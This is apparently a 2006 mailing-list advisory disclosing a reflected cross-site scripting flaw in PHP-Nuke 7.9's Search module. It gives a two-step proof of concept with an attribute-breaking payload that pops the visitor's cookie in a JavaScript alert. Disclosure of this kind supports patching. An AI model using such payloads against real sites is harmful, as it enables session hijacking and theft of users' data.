PHP-Nuke <= 7.9 Search XSS Vulnerability

try_og Thu, 08 Jun 2006 13:41:51 -0700

# PHP-Nuke <= 7.9 Search module XSS Vulnerability

# It could work on later versions if PHP-Nuke does not patch it.



1: Enter: http://[host]/modules.php?name=Search

2: Search for: "><body onload="alert(document.cookie)


// You'll get a javascript alert with your cookie in it.


# Credits: O.G.

PHP-Nuke <= 7.9 Search XSS Vulnerability

Reply via email to